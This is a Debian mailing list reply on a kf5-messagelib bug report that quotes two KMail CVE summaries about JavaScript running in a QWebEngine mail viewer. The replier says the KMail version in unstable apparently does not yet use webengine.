[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Bug#853241: kf5-messagelib: CVE-2016-7967 CVE-2016-7968

Am Montag, 30. Januar 2017, 19:55:16 CET schrieb Thorsten Alteholz:
> Package: kf5-messagelib
> Severity: important
> Tags: security
[…]
> the following vulnerabilities were published for kf5-messagelib.
> 
> CVE-2016-7967[0]:
> | KMail since version 5.3.0 used a QWebEngine based viewer that had
> | JavaScript enabled. Since the generated html is executed in the local
> | file security context by default access to remote and local URLs was
> | enabled.
> 
> CVE-2016-7968[1]:
> | KMail since version 5.3.0 used a QWebEngine based viewer that had
> | JavaScript enabled. HTML Mail contents were not sanitized for
> | JavaScript and included code was executed.

Unstable has KMail 5.2.3 from KDEPIM 16.04 which AFAIK doesn´t use webengine 
yet. I am not sure whether the older KMail + messagelib stuff has similar 
issues.

Ciao,
-- 
Martin
Reply to: